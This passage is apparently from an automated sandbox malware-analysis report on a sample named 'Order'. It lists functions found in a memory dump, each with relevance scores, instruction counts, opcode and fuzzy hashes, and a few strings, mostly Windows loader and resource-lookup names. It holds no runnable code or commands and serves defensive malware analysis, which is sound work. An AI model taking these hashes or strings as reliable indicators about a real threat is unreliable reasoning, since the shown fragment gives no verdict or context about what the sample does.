                                                                • Instruction Fuzzy Hash: 6B7159B1A0014A9FDB01DFA8C990FAEBBF8FF58704F144065E905E7251EA74EE05CBA1
                                                                Function 019CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • LdrResSearchResource Enter, xrefs: 019CAA13
                                                                • LdrResSearchResource Exit, xrefs: 019CAA25
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                • API String ID: 0-4066393604
                                                                • Opcode ID: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
                                                                • Instruction ID: 6bec9b9bc394089ee13592f969a41ab15ef8954927d00ab98457b37e0486713c
                                                                • Opcode Fuzzy Hash: a60e87a9e081a0ef66e426b9c518d083d0b1132df8410e77569a3342cc0c5dd2
                                                                • Instruction Fuzzy Hash: C0E1A271E0421D9FEF22CF9DC940BAEBBBABF49750F14442AE945E7241E7389940CB51
                                                                Function 01A8A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction ID: 7a0cea0dc5a66d6036798dd3bdda28ea0472c823189d47b18c12550c3928bf6d
                                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                • Instruction Fuzzy Hash: A0C1CF312043429BEB25EF28C841B6BBBE5AFC4318F084A2EF696CB291D778D545CB51
                                                                Function 01A3E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                • Opcode ID: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
                                                                • Instruction ID: 7f71d8067389061673f5a8f4a7a7b972bf7aa8f37ca5f2cb1c127fcfc66437aa
                                                                • Opcode Fuzzy Hash: 9fc6bd995607e78b43e9d0afd65e7739ea84adfd7492b2b155d1803f35244f82
                                                                • Instruction Fuzzy Hash: B4613871E003199FDB26DFA9C940BAEBBF9FB88700F14406DE649EB291D731A940CB50
                                                                Function 01A643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                • Opcode ID: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
                                                                • Instruction ID: 3f8f1eb0d055d4cf7310bb183c45a5f6decabd00058bfdad9ccac46ee22398a9
                                                                • Opcode Fuzzy Hash: 88a0d45a1cd784817eb534a05298615686172c43aacf829fa88fa30eea899040
                                                                • Instruction Fuzzy Hash: 6B512AB1D0021DAFEF11DFA9CD84AEEBBBCEB48754F10052AE615B7290D6309E05CB60
                                                                Function 019C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • kLsE, xrefs: 019C0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019C063D
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                • Opcode ID: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
                                                                • Instruction ID: a69bdf3bf4ebe901e99f8e134e154f6962f112c4375989075dfe8b4536dc7344
                                                                • Opcode Fuzzy Hash: 2355e73b6ed139be827d7f7f3b6c71b44d36835a1359ce5e23fa3d1fe729c890
                                                                • Instruction Fuzzy Hash: B151CD79500742CBD724DF39C6446A7BBE8AF84B05F18493EE6DE87241E7309545CF92
                                                                Function 019CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 019CA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 019CA309
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                • Opcode ID: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
                                                                • Instruction ID: bba06430f9a564b38d48f745625aef9221cc2bf79c5617ce9089c9e7d9c3563f
                                                                • Opcode Fuzzy Hash: abf3336140e23ce22d53dfc13697fb0ab6f1d386a916b5e9b02a8eef5ae7f0b3
                                                                • Instruction Fuzzy Hash: 6741D371A04659DFEB15CF6DC450B6E7BB4FF84B00F14446AE948DB291E3B5DA00CB52
                                                                Function 019FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                • Opcode ID: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
                                                                • Instruction ID: 1ce839a684051291af2588d3a78e53b946f3aa42daf3ca285db329796b54b820
                                                                • Opcode Fuzzy Hash: e7cc2a7052af038e171be892598f455e1de0f4e2ee35204f3ae1fe80846bb6ca
                                                                • Instruction Fuzzy Hash: 9401F4B2250744AFE312DF24CD45F1677E8E784715F01893EA64CC71A0E334D804CB46
                                                                Function 019CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                • Opcode ID: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
                                                                • Instruction ID: eda3f742bc1aef309efddea62688ce08ed8da351f77427027973d8296bf6a68c
                                                                • Opcode Fuzzy Hash: 73438fbf165d5077011853b0cd735223bd7af34bbb4c7d181ae1faeda92b0432
                                                                • Instruction Fuzzy Hash: 9E825D75E002198BEB25CFA9C880BEDBBB5BF48B10F14816DD99DAB291D7309941CF52
                                                                Function 01A46420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
                                                                • Instruction ID: c2ce1b4653ff727752f9812f2fcedb10c36501c2ae02cd8e90b005e017466b99
                                                                • Opcode Fuzzy Hash: e6c295872c605c6034d957674b0d827994c5e3e3c883a4c9bf3727f460dbefbb
                                                                • Instruction Fuzzy Hash: 6E918371940219AFEB21DFA5CD85FAEBBB8EF95750F104015F608BB190D775AD00CBA1
                                                                Function 01A6E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
                                                                • Instruction ID: 329763fb91f62ed2d03e1b8056fc7f63a4ca29f133bd8d6f082359a944cd3bf4
                                                                • Opcode Fuzzy Hash: f4845e94c6baf088917028b802bddaa9e67d69b369c33e5b3c21389b57e688e8
                                                                • Instruction Fuzzy Hash: 8391AD76A00649BEDF22EBA5DC44FAFBBBEEF85740F140029F604A7250DB349905CB90
                                                                Function 019FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                • Opcode ID: 2940a643d7b0d40eb3e4669faa2cd54150efcae8e374d1fc5247610c48dba721
                                                                • Instruction ID: 2fe5c63ef15f7663afb4bdd32e22ef3f88abcb89dc102d45bf27f29cd817dcec
                                                                • Opcode Fuzzy Hash: 2940a643d7b0d40eb3e4669faa2cd54150efcae8e374d1fc5247610c48dba721
                                                                • Instruction Fuzzy Hash: 2F715EB5E0020AAFDF2ACF9DD5907ADBBB1BF88710F14812EF509A7245E7719A41CB50
                                                                Function 01A64978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .mui
                                                                • API String ID: 0-1199573805
                                                                • Opcode ID: 38a92f56e2d4a32b898901316c2458014286971a7d7d5da650d261f6700c89cb
                                                                • Instruction ID: c748e302a0cc15eac304f3986814d8b246a465047ad6602811532346b2f52d8a
                                                                • Opcode Fuzzy Hash: 38a92f56e2d4a32b898901316c2458014286971a7d7d5da650d261f6700c89cb
                                                                • Instruction Fuzzy Hash: 2851B772D0022AEBDF15DF99D840AAEBBB9FF58B14F054129EA15BB240D7349D01CBE4
                                                                Function 019DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                • Opcode ID: 08c6d515bcb0930743b07dcc08c8b0638665510d33f222cd980493db1111b065
                                                                • Instruction ID: e9d6b79b701d696cce902bd4c61ede6f6bcef5af7dd026761fca42f5ca51c496
                                                                • Opcode Fuzzy Hash: 08c6d515bcb0930743b07dcc08c8b0638665510d33f222cd980493db1111b065
                                                                • Instruction Fuzzy Hash: CC419072508312ABD711DE79C980B6BB7ECAFC8B14F45892DFA8CDB180E674D904C796
                                                                Function 01A3C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                • Opcode ID: cf0200b7a00a3f26351b902480ea1f0be4bb2e0c55f770f1ba4792217d9ce8c4
                                                                • Instruction ID: 0ea30e4ced1b1879d988e0f06e470eaa88cf7966f27cb3daa7bfdbe22bc72725
                                                                • Opcode Fuzzy Hash: cf0200b7a00a3f26351b902480ea1f0be4bb2e0c55f770f1ba4792217d9ce8c4
                                                                • Instruction Fuzzy Hash: 574154B1D0022DABDB21DB50DD84FDEB77CAB44724F0045A6BB08B7145DB709E898FA4
                                                                Function 01A56B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                • Opcode ID: e463553afb18d2cfb8b9957695ae280b6fcd5d86d5916d20a02594157b98e009
                                                                • Instruction ID: 9d35b4135a65e3c413f8280d6cc9fa4ecdccd45491c55d7aa3552b25a361339b
                                                                • Opcode Fuzzy Hash: e463553afb18d2cfb8b9957695ae280b6fcd5d86d5916d20a02594157b98e009
                                                                • Instruction Fuzzy Hash: 14313931E047499BEB22DF69C850BFE7BB8EF54705F944028EE48AB282C775D805CB50
                                                                Function 01A4892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A4895E
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                • API String ID: 0-702105204
                                                                • Opcode ID: a94d76a0268f2fd4ac7e3f9698c23c759da09892352b53fcfba187ce7dd9f7cd
                                                                • Instruction ID: 21c1f8f9057e49841ce78f1b78c9eb7bd69304d22b4bb0bd76b721dd8dd76040
                                                                • Opcode Fuzzy Hash: a94d76a0268f2fd4ac7e3f9698c23c759da09892352b53fcfba187ce7dd9f7cd
                                                                • Instruction Fuzzy Hash: 9901473A200A81AFE6256F99E8C4A577F69EFC5654F08001CF64143153CB746841C793
                                                                Function 01A62000 Relevance: .8, Instructions: 757COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 504303fbb81be4342f2889e07d5c8277103852a35bcde35f165f574b5f4dc8d5
                                                                • Instruction ID: 4844363f1323e3fc57afe176339367d743ccada8e91dd8d0bc2a7c00f017967f
                                                                • Opcode Fuzzy Hash: 504303fbb81be4342f2889e07d5c8277103852a35bcde35f165f574b5f4dc8d5
                                                                • Instruction Fuzzy Hash: E142D4356083419BE726CF68C890B6BBBE9FFC8300F08492EFA9697250D775D845CB52
                                                                Function 01A58158 Relevance: .6, Instructions: 617COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 77fd705fec481fed6e0682d856125e7cb80c0fca1d7a0af49b16bfe3fc2beef5
                                                                • Instruction ID: e3f0e1ce563c0daa36340aa59347c248691ab8e6ce5ff5f3862f03080b6fe36e
                                                                • Opcode Fuzzy Hash: 77fd705fec481fed6e0682d856125e7cb80c0fca1d7a0af49b16bfe3fc2beef5
                                                                • Instruction Fuzzy Hash: 7B426F75E042199FEB65CF69C841BADBBF5FF88310F188099E949EB242D7389981CF50
                                                                Function 019D2840 Relevance: .6, Instructions: 605COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9847916399875665e24df9c008437e4a07e13b9de6fc426d934d35767c54bd53
                                                                • Instruction ID: c72292089a02d81c18c85e3a3b27f7aea075298424caad1f39418c41a424ae55
                                                                • Opcode Fuzzy Hash: 9847916399875665e24df9c008437e4a07e13b9de6fc426d934d35767c54bd53
                                                                • Instruction Fuzzy Hash: 8B32D070A017658BEB25CF6DC9447BEBBF2BF84304F14811DD98E9B285D775A802CB50
                                                                Function 01A6A118 Relevance: .6, Instructions: 591COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e59ff9f984b71b5bbbffd3528408d607b1e582cee279e842ee23c2c1c2fc55dc
                                                                • Instruction ID: 6dd8bcb8a39b94f8489bc0527107da9f9c336b8489a91a65f9076a1d851d4cd7
                                                                • Opcode Fuzzy Hash: e59ff9f984b71b5bbbffd3528408d607b1e582cee279e842ee23c2c1c2fc55dc
                                                                • Instruction Fuzzy Hash: F722D2742046618BEB25CF2DC494372BBF9BF45300F08845ADA97EF286D739E852DB60
                                                                Function 019C6A50 Relevance: .5, Instructions: 548COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ed1e866738396dde76b783eae5d8333387847934924941719f5cb95574e02d0a
                                                                • Instruction ID: 4c8853dcfb42837e3914c2f6908e5b22dd858974cc4a253ce7e36b0a5df95cd9
                                                                • Opcode Fuzzy Hash: ed1e866738396dde76b783eae5d8333387847934924941719f5cb95574e02d0a
                                                                • Instruction Fuzzy Hash: 8E328A71A04215CFDB25CF6CC580AAABBF5FF48700F14856EE999AB392D734E841CB91
                                                                Function 019E4A35 Relevance: .4, Instructions: 423COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction ID: 431c04eca15620ad886390ddfefb8a3892e83a4e0791b9784e3ec146f663237f
                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction Fuzzy Hash: 8FF16271E0021A9FDF16CF99C584BAEBBF5AF48714F098129E909EB341E774E841CB60
                                                                Function 01A5892B Relevance: .4, Instructions: 386COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f1ebf6f9ed2fe7571a3b228cd3f401dc30635bec96930215f1868b8d4e875770
                                                                • Instruction ID: 0bfb830978cf1a229a17e3a7d6ad5fef3b18f7311949adc1044b02afde59ef7e
                                                                • Opcode Fuzzy Hash: f1ebf6f9ed2fe7571a3b228cd3f401dc30635bec96930215f1868b8d4e875770
                                                                • Instruction Fuzzy Hash: 16D12072E0860A8BDF45CF6AC841AFEB7F5AF88304F198129D955E7241E73DE905CB60
                                                                Function 019C65D0 Relevance: .4, Instructions: 383COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ecf190c0aa3711fc312cf1c43197e4c0cd4d81e2ebbb5066780adfd82109e2ea
                                                                • Instruction ID: c532566fc3a434e0e4f548ad4abbdf088cc1e2d4a8f30ed3ec74eb5ecada5a41
                                                                • Opcode Fuzzy Hash: ecf190c0aa3711fc312cf1c43197e4c0cd4d81e2ebbb5066780adfd82109e2ea
                                                                • Instruction Fuzzy Hash: 8AE18A71608342CFC715CF28C190A6ABBF4FF89714F158A6DE99987351EB31E905CB92
                                                                Function 019B8397 Relevance: .4, Instructions: 380COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f48a109af2429618d1ec0a08da976dabc6abc07006d142d02f0ac7c252992ba7
                                                                • Instruction ID: 6689197ea8e0b7be964d5004e92cfdb8a1e183dc87e91b0490899f3abef3b2dc
                                                                • Opcode Fuzzy Hash: f48a109af2429618d1ec0a08da976dabc6abc07006d142d02f0ac7c252992ba7
                                                                • Instruction Fuzzy Hash: 95D1D571A00206DBDB14DF69C9C0EFA77B9BF98714F04492DE92ADB284E734D951CB60
                                                                Function 01A48243 Relevance: .3, Instructions: 322COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction ID: 71ec00295dcebc949464e42d628ab8e63218dc9811bf6ed3e20a1e9834ae24f1
                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction Fuzzy Hash: 6DB17174A00705AFDB64DFD9D940EABBBB9FFC4304F14446EAA12A7794DA38E905CB10
                                                                Function 019D0535 Relevance: .3, Instructions: 300COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction ID: 13338309095568538e6e9967ef6b437a5ba26fc6a447b0cd61a7c74f4c0cc9ed
                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction Fuzzy Hash: AAB11731604656AFDB11DBACC840FBEBBF6BF88300F188559E65ADB281D730EA41CB50
                                                                Function 019C83C0 Relevance: .3, Instructions: 281COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e1be4be042c5c8e7d7dcdf4d40caa05ee3ac66226b49d68bc6c2600fc4236bb4
                                                                • Instruction ID: 04915aee6204fee516a10d8725849470c2bf2104ec6f8b8854fac86e548dce04
                                                                • Opcode Fuzzy Hash: e1be4be042c5c8e7d7dcdf4d40caa05ee3ac66226b49d68bc6c2600fc4236bb4
                                                                • Instruction Fuzzy Hash: 16C14874208381CFD764CF19C484BABB7E9BF98704F44496EE98987291D7B4E948CF92
                                                                Function 019BC427 Relevance: .3, Instructions: 280COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5de737f5cfc2948e7a633fc14af5bc7688bcffc82c10153aeb75b1495e4d0248
                                                                • Instruction ID: 41fac92d730aa2e59536d45fca5d790b30dbbde6dd466865c7db89037737473c
                                                                • Opcode Fuzzy Hash: 5de737f5cfc2948e7a633fc14af5bc7688bcffc82c10153aeb75b1495e4d0248
                                                                • Instruction Fuzzy Hash: C3B18370A042668BDB25CF58C980BE9B3F5EF84710F0485EAD54EE7281EB70DD85CB21
                                                                Function 019EE5E7 Relevance: .3, Instructions: 278COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 84c70803df3baffd628d07372195c16b2981ffed83bc338e3954ff861adde694
                                                                • Instruction ID: ed35095b85f398de73cba8395c3c2869f8bc023bded404daca2cf2e2530c2818
                                                                • Opcode Fuzzy Hash: 84c70803df3baffd628d07372195c16b2981ffed83bc338e3954ff861adde694
                                                                • Instruction Fuzzy Hash: 16A10571E006699FEB22DB5CC948FAEBBF4BB44B14F050125EA04AB2D1D7749D41CBD1
                                                                Function 01A00185 Relevance: .3, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000009.00000002.1782419034.0000000001990000.00000040.00001000.00020000.00000000.sdmp, Offset: 01990000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_9_2_1990000_Order.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70f8d1f25cbebd9c88f58a563fcbd6e724289c564d8c85bbac35c658ef98def5
                                                                • Instruction ID: 27d69b4e4a88ea8f1daa9a107a813a1663277a6591f6581ec8eb5a1b7ef0bf18
